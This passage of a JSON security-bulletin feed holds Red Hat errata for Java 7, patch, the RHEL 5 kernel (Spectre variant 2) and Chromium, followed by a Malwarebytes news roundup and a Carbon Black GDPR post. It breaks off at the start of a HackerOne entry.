"RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.7.0-oracle-src", "packageFilename": "java-1.7.0-oracle-src-1.7.0.181-1jpp.1.el7.x86_64.rpm", "operator": "lt"}], "description": "Oracle Java SE version 7 includes the Oracle Java Runtime Environment and the Oracle Java Software Development Kit.\n\nThis update upgrades Oracle Java SE 7 to version 7 Update 181.\n\nSecurity Fix(es):\n\n* OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025) (CVE-2018-2814)\n\n* OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997) (CVE-2018-2794)\n\n* OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977) (CVE-2018-2795)\n\n* OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981) (CVE-2018-2796)\n\n* OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985) (CVE-2018-2797)\n\n* OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989) (CVE-2018-2798)\n\n* OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993) (CVE-2018-2799)\n\n* OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833) (CVE-2018-2800)\n\n* OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757) (CVE-2018-2815)\n\n* OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969) (CVE-2018-2790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:33:15", "type": "redhat", "title": "(RHSA-2018:1201) Critical: java-1.7.0-oracle security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-2790", "CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2796", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2799", "CVE-2018-2800", "CVE-2018-2814", "CVE-2018-2815"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T20:56:29", "id": "RHSA-2018:1201", "href": "https://access.redhat.com/errata/RHSA-2018:1201", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T18:38:54", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "aarch64", "packageName": "patch", "packageFilename": "patch-2.7.1-10.el7_5.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "ppc64", "packageName": "patch", "packageFilename": "patch-2.7.1-10.el7_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "ppc64le", "packageName": "patch", "packageFilename": "patch-2.7.1-10.el7_5.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "s390x", "packageName": "patch", "packageFilename": "patch-2.7.1-10.el7_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "src", "packageName": "patch", "packageFilename": "patch-2.7.1-10.el7_5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "x86_64", "packageName": "patch", "packageFilename": "patch-2.7.1-10.el7_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "aarch64", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.7.1-10.el7_5.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "ppc64", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.7.1-10.el7_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "ppc64le", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.7.1-10.el7_5.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "s390x", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.7.1-10.el7_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.7.1-10.el7_5", "arch": "x86_64", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.7.1-10.el7_5.x86_64.rpm", "operator": "lt"}], "description": "The patch program applies diff files to originals. The diff command is used to compare an original to a changed file. Diff lists the changes made to the file. A person who has the original file can then use the patch command with the diff file to add the changes to their original file (patching the file).\n\nPatch should be installed because it is a common way of upgrading applications.\n\nSecurity Fix(es):\n\n* patch: Malicious patch files cause ed to execute arbitrary commands (CVE-2018-1000156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:32:14", "type": "redhat", "title": "(RHSA-2018:1200) Important: patch security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-1000156"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T20:36:05", "id": "RHSA-2018:1200", "href": "https://access.redhat.com/errata/RHSA-2018:1200", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T16:37:14", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "i686", "packageName": "patch", "packageFilename": "patch-2.6-8.el6_9.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "ppc64", "packageName": "patch", "packageFilename": "patch-2.6-8.el6_9.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "s390x", "packageName": "patch", "packageFilename": "patch-2.6-8.el6_9.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "src", "packageName": "patch", "packageFilename": "patch-2.6-8.el6_9.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "x86_64", "packageName": "patch", "packageFilename": "patch-2.6-8.el6_9.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "i686", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "ppc64", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "s390x", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "x86_64", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.x86_64.rpm", "operator": "lt"}], "description": "The patch program applies diff files to originals. The diff command is used to compare an original to a changed file. Diff lists the changes made to the file. A person who has the original file can then use the patch command with the diff file to add the changes to their original file (patching the file).\n\nPatch should be installed because it is a common way of upgrading applications.\n\nSecurity Fix(es):\n\n* patch: Malicious patch files cause ed to execute arbitrary commands (CVE-2018-1000156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:30:19", "type": "redhat", "title": "(RHSA-2018:1199) Important: patch security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-1000156"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T20:33:18", "id": "RHSA-2018:1199", "href": "https://access.redhat.com/errata/RHSA-2018:1199", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T12:42:41", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-PAE-debuginfo", "packageFilename": "kernel-PAE-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-430.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i386", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-430.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important, x86-64)\n\nRed Hat would like to thank Google Project Zero for reporting this issue.\n\nBug Fix(es):\n\n* The Return Trampolines (Retpolines) mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. With this update, the support for Retpolines has been implemented into the Red Hat Enterprise Linux kernel. (BZ#1535650)", "reporter": "RedHat", "published": "2018-04-23T16:27:20", "type": "redhat", "title": "(RHSA-2018:1196) Important: kernel security and bug fix update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T16:29:58", "id": "RHSA-2018:1196", "href": "https://access.redhat.com/errata/RHSA-2018:1196", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-23T12:41:55", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "i686", "packageName": "chromium-browser", "packageFilename": "chromium-browser-66.0.3359.117-1.el6_9.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "x86_64", "packageName": "chromium-browser", "packageFilename": "chromium-browser-66.0.3359.117-1.el6_9.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "i686", "packageName": "chromium-browser-debuginfo", "packageFilename": "chromium-browser-debuginfo-66.0.3359.117-1.el6_9.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "x86_64", "packageName": "chromium-browser-debuginfo", "packageFilename": "chromium-browser-debuginfo-66.0.3359.117-1.el6_9.x86_64.rpm", "operator": "lt"}], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 66.0.3359.117.\n\nSecurity Fix(es):\n\n* chromium-browser: Use after free in Disk Cache (CVE-2018-6085)\n\n* chromium-browser: Use after free in Disk Cache (CVE-2018-6086)\n\n* chromium-browser: Use after free in WebAssembly (CVE-2018-6087)\n\n* chromium-browser: Use after free in PDFium (CVE-2018-6088)\n\n* chromium-browser: Same origin policy bypass in Service Worker (CVE-2018-6089)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6090)\n\n* chromium-browser: Incorrect handling of plug-ins by Service Worker (CVE-2018-6091)\n\n* chromium-browser: Integer overflow in WebAssembly (CVE-2018-6092)\n\n* chromium-browser: Same origin bypass in Service Worker (CVE-2018-6093)\n\n* chromium-browser: Exploit hardening regression in Oilpan (CVE-2018-6094)\n\n* chromium-browser: Lack of meaningful user interaction requirement before file upload (CVE-2018-6095)\n\n* chromium-browser: Fullscreen UI spoof (CVE-2018-6096)\n\n* chromium-browser: Fullscreen UI spoof (CVE-2018-6097)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6098)\n\n* chromium-browser: CORS bypass in ServiceWorker (CVE-2018-6099)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6100)\n\n* chromium-browser: Insufficient protection of remote debugging prototol in DevTools (CVE-2018-6101)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6102)\n\n* chromium-browser: UI spoof in Permissions (CVE-2018-6103)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6104)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6105)\n\n* chromium-browser: Incorrect handling of promises in V8 (CVE-2018-6106)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6107)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6108)\n\n* chromium-browser: Incorrect handling of files by FileAPI (CVE-2018-6109)\n\n* chromium-browser: Incorrect handling of plaintext files via file:// (CVE-2018-6110)\n\n* chromium-browser: Heap-use-after-free in DevTools (CVE-2018-6111)\n\n* chromium-browser: Incorrect URL handling in DevTools (CVE-2018-6112)\n\n* chromium-browser: URL spoof in Navigation (CVE-2018-6113)\n\n* chromium-browser: CSP bypass (CVE-2018-6114)\n\n* chromium-browser: Incorrect low memory handling in WebAssembly (CVE-2018-6116)\n\n* chromium-browser: Confusing autofill settings (CVE-2018-6117)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T16:24:32", "type": "redhat", "title": "(RHSA-2018:1195) Critical: chromium-browser security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-6085", "CVE-2018-6086", "CVE-2018-6087", "CVE-2018-6088", "CVE-2018-6089", "CVE-2018-6090", "CVE-2018-6091", "CVE-2018-6092", "CVE-2018-6093", "CVE-2018-6094", "CVE-2018-6095", "CVE-2018-6096", "CVE-2018-6097", "CVE-2018-6098", "CVE-2018-6099", "CVE-2018-6100", "CVE-2018-6101", "CVE-2018-6102", "CVE-2018-6103", "CVE-2018-6104", "CVE-2018-6105", "CVE-2018-6106", "CVE-2018-6107", "CVE-2018-6108", "CVE-2018-6109", "CVE-2018-6110", "CVE-2018-6111", "CVE-2018-6112", "CVE-2018-6113", "CVE-2018-6114", "CVE-2018-6116", "CVE-2018-6117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T16:26:16", "id": "RHSA-2018:1195", "href": "https://access.redhat.com/errata/RHSA-2018:1195", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-04-23T16:36:36", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Last week, we took [a stroll down memory lane](<https://blog.malwarebytes.com/cybercrime/2018/04/myspace-vs-facebook-good-old-days/>) talking about Facebook and MySpace, noticed [a change](<https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/>) in the Magnitude exploit kit\u2014wherein it started adopting the [GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>), took a good look at [a new form of adware](<https://blog.malwarebytes.com/threat-analysis/2018/04/pbot-python-based-adware/>) that is based on Python, chatted a bit [about Russian hacking](<https://blog.malwarebytes.com/cybercrime/2018/04/perspectives-on-russian-hacking/>) with a journalist, encouraged retailers to [ask the right questions](<https://blog.malwarebytes.com/101/2018/04/5-cybersecurity-questions-retailers-must-ask-protect-businesses/>) to protect their business, and weighed in on [a way to speed up Internet bandwidth and increase privacy](<https://blog.malwarebytes.com/101/how-tos/2018/04/cloudflares-new-dns-service/>) via Cloudflare's new DNS service.\n\n### Other news\n\n * Cryptocurrency is all the rave these days\u2014and so are cryptominers. Security researchers recently discovered one that [doesn't rely on an open browser session](<https://www.hackread.com/malware-mine-cryptocurrency-without-open-browser-session/>). (Source: HackRead)\n * Tax fraud is no longer for the clueless, it seems. Experts noticed that scammers are [also targeting tax professionals](<https://www.cnbc.com/2018/04/14/cybercriminals-now-targeting-tax-pros-to-cash-in-on-fraudulent-returns.html>)\u2014those filing taxes on behalf of their clients. (Source: CNBC)\n * To date, adware, spyware, and malware have lurked inside the Google Play Store. But [surveillanceware](<https://blog.lookout.com/desert-scorpion-google-play>)? That's definitely something new. (Source: Lookout Blog)\n * At the recently concluded RSA conference, tech companies like Microsoft and Facebook [joined together to sign a pledge](<https://www.zdnet.com/article/microsoft-facebook-dozens-more-sign-cybersecurity-tech-accord/>) to protect users and refrain from helping any government launch a cyberattack. (Source: ZDNet)\n * While the usage of Adobe Flash has significantly decreased, [this doesn't mean that the threats exploiting them have declined](<https://securingtomorrow.mcafee.com/mcafee-labs/despite-decline-use-adobe-flash-vulnerabilities-will-continue-cause-concern/>). So remain vigilant! (Source: McAfee's Securing Tomorrow Blog)\n * Gmail's new \"Confidential Mode\" is [not entirely private](<https://nakedsecurity.sophos.com/2018/04/17/gmails-new-confidential-mode-wont-be-completely-private/>) after all. SIGH. (Source: Sophos's Naked Security Blog)\n * Security researchers noticed [an increased activity of APT groups](<https://www.scmagazineuk.com/new-hacker-groups-emerging-in-asia-and-in-the-middle-east-finds-kaspersky/article/759368/>) based in Asia and the Middle East. (Source: SC Magazine)\n * Here's a new word to keep in mind: [_trustjacking_.](<https://www.wired.com/story/trustjacking-ios-itunes-wi-fi-sync-attack/>) And iPhone users are particularly at risk of this one. (Source: Wired)\n * [Stresspaint](<https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/>), a new information stealer, is a type of malware that is after Chrome login data, session cookies, and appears to be particularly interested in Facebook details. (Source: Bleeping Computer)\n * A ransomware variant appeared to be [repurposed](<https://www.zdnet.com/article/this-ransomware-was-rewritten-to-mine-cryptocurrency-and-destroy-your-files/>) to infect files, mine for cryptocurrency\u2026and destroy affected users' files. Good grief! (Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (April 16 \u2013 April 22)](<https://blog.malwarebytes.com/security-world/2018/04/week-security-april-16-april-22/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Malwarebytes Labs", "published": "2018-04-23T16:06:58", "type": "malwarebytes", "title": "A week in security (April 16 \u2013 April 22)", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T16:06:58", "id": "MALWAREBYTES:148F6C7338860226F9178BF5B447E08B", "href": "https://blog.malwarebytes.com/security-world/2018/04/week-security-april-16-april-22/", "cvss": {"score": 0.0, "vector": "NONE"}}], "carbonblack": [{"lastseen": "2018-04-23T16:39:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "At Carbon Black, keeping our customers\u2019 data safe is a top priority.\n\nThe European Union\u2019s General Data Protection Regulation (\u201cGDPR\u201d), a comprehensive European privacy law that takes effect on May 25, 2018, has shined a light on the importance of securing personal data. The GDPR is designed to harmonize data protection laws across the European Union (\u201cEU\u201d) and protect the privacy of the personal data of EU data subjects. GDPR also serves as an opportunity for Carbon Black to continue our commitment to keeping our customers protected. \n\nWe take data protection seriously for all of our customers and have been working to uphold the highest standards of privacy. We have approached our GDPR preparation activities with that in mind, and are finalizing the updates and changes to our data processing policies, operations, activities and documentation in anticipation of the upcoming GDPR effective date.\n\nWe have established a robust GDPR compliance program designed to ensure strong protection and secure processing of our customers\u2019 personal data. To learn more about our approach to \u201cSecurity and Privacy by Design,\u201d I encourage you to read the materials listed on our [Product Security page](<https://www.carbonblack.com/why-cb/product-security/>).\n\nIn addition to [our own GDPR compliance efforts](<https://www.carbonblack.com/why-cb/product-security/corporate-gdpr-readiness/>), Carbon Black\u2019s products and services can help support our customers\u2019 security, risk, and compliance program efforts relating to GDPR and other privacy regulations. [You can learn more](<https://www.carbonblack.com/products/solutions/use-case/risk-and-compliance/gdpr/>)_ about how here. _\n\nAt Carbon Black we take data protection seriously within our own systems, striving to deliver the highest levels of security and privacy for your data. I encourage you to review the documents referenced above to further understand the thoroughness and completeness of our security and privacy practices. If you have additional, more specific questions relating to Carbon Black\u2019s internal GDPR compliance activities, I invite you to contact our compliance team at [privacy@carbonblack.com](<mailto:privacy@carbonblack.com>).\n\nThe post [Carbon Black's Commitment to GDPR & Keeping Customer Data Safe](<https://www.carbonblack.com/2018/04/23/carbon-blacks-commitment-gdpr-keeping-customer-data-safe/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "reporter": "Ryan Murphy", "published": "2018-04-23T15:36:28", "type": "carbonblack", "title": "Carbon Black\u2019s Commitment to GDPR & Keeping Customer Data Safe", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T15:36:28", "id": "CARBONBLACK:F8AB6DE17F25B557EDD29B7DCFA4EDBA", "href": "https://www.carbonblack.com/2018/04/23/carbon-blacks-commitment-gdpr-keeping-customer-data-safe/", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2018-04-23T15:34:18", "references": [], 